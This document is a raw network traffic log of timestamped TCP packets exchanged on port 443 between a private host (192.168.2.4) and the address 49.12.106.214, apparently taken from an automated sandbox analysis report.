                                                                                                                Oct 8, 2024 04:59:46.729201078 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.729259014 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.729269028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.729315042 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740027905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740046978 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740099907 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740106106 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740123987 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740145922 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.758419037 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758435011 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758498907 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.758505106 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758547068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.772213936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772238016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772341013 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.772351027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772396088 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.782891989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.782915115 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.782980919 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.782985926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.783027887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791362047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791380882 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791474104 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791482925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791492939 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791524887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803430080 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803452015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803512096 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803518057 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803564072 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803590059 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807722092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807742119 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807801008 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807810068 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807842970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807862997 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816023111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816042900 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816106081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816112995 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816138983 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816157103 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826651096 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826669931 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826726913 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826731920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826771975 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826802015 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.845151901 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845170021 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845258951 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.845273018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845310926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.858952045 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.858972073 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.859021902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.859030962 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.859060049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.859076023 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.869654894 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869683981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869806051 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.869817972 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869858980 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.878185034 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878205061 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878285885 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.878294945 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878333092 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890258074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890279055 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890341043 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890358925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890377045 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890402079 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.895483017 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895507097 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895591974 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.895601034 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895646095 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.902899981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.902918100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.902985096 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.902991056 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.903028011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.913539886 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913570881 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913625956 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.913631916 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913674116 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.932473898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358664989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358676910 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358695030 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358724117 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358736038 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358764887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358769894 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358834982 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380079985 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380105019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380415916 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380433083 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380564928 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380580902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380686998 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380693913 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380738974 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.426654100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426708937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426794052 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426884890 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426970005 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.426991940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.427025080 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.427063942 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.444674015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444751024 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444873095 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444920063 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445041895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445067883 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445113897 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445149899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445163965 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445194960 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445214987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445216894 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445238113 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445271015 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445281029 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445312023 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445322990 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445367098 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445389032 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467303038 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467360973 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467420101 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467443943 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467494965 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467499018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467518091 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467535019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467565060 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467566967 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467597008 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467607975 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467638969 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467677116 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.513505936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513572931 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513669968 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513873100 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.513899088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513973951 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531657934 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531721115 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531785965 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531804085 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531851053 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531876087 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531879902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531908989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531946898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531958103 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531984091 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531989098 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532018900 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532054901 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532090902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532128096 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532157898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532162905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532218933 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532227993 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532248020 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532253027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532274008 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532300949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532305956 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532352924 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532375097 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.553868055 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.553922892 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554023027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554071903 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554116011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.554126978 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554167986 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.554219007 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.599837065 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599863052 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599895954 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599939108 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599952936 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.599962950 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.600012064 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.600049019 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626727104 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626785994 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626815081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626821041 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626852036 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626882076 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626905918 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626956940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626981020 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626986980 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627031088 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627074957 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627114058 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627145052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627151012 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627170086 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627199888 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627224922 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627269983 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627298117 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627302885 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627334118 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627356052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640449047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640489101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640522957 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640531063 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640592098 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640770912 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640818119 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640847921 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640852928 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640887976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640907049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686722040 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686779022 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686817884 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686830997 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686862946 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686875105 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686883926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686904907 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686930895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686954975 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686970949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687024117 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.687052011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.396581888 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.396605968 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.396622896 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.409244061 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.409287930 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.409332991 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.409346104 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.409375906 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.409390926 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.423181057 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.423221111 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.423261881 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.423271894 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.423300028 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.423314095 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.434151888 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.434191942 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.434251070 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.434262991 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.434289932 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.434305906 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.445385933 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.445434093 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.445467949 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.445492029 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.445518017 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.445534945 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.454166889 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.454212904 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.454251051 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.454265118 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.454293013 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.454330921 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.463875055 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.463913918 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.463953972 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.463965893 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.463988066 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.466576099 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.473254919 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.473309040 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.473370075 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.473382950 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.473408937 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.473428011 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.480635881 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.480678082 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.480722904 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.480735064 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.480762959 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.480777025 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.496248960 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.496290922 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.496321917 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.496334076 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.496361971 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.496380091 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.510025978 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.510063887 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.510112047 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.510123014 CEST4434975349.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:53.510152102 CEST49753443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:53.510166883 CEST49753443192.168.2.449.12.106.214
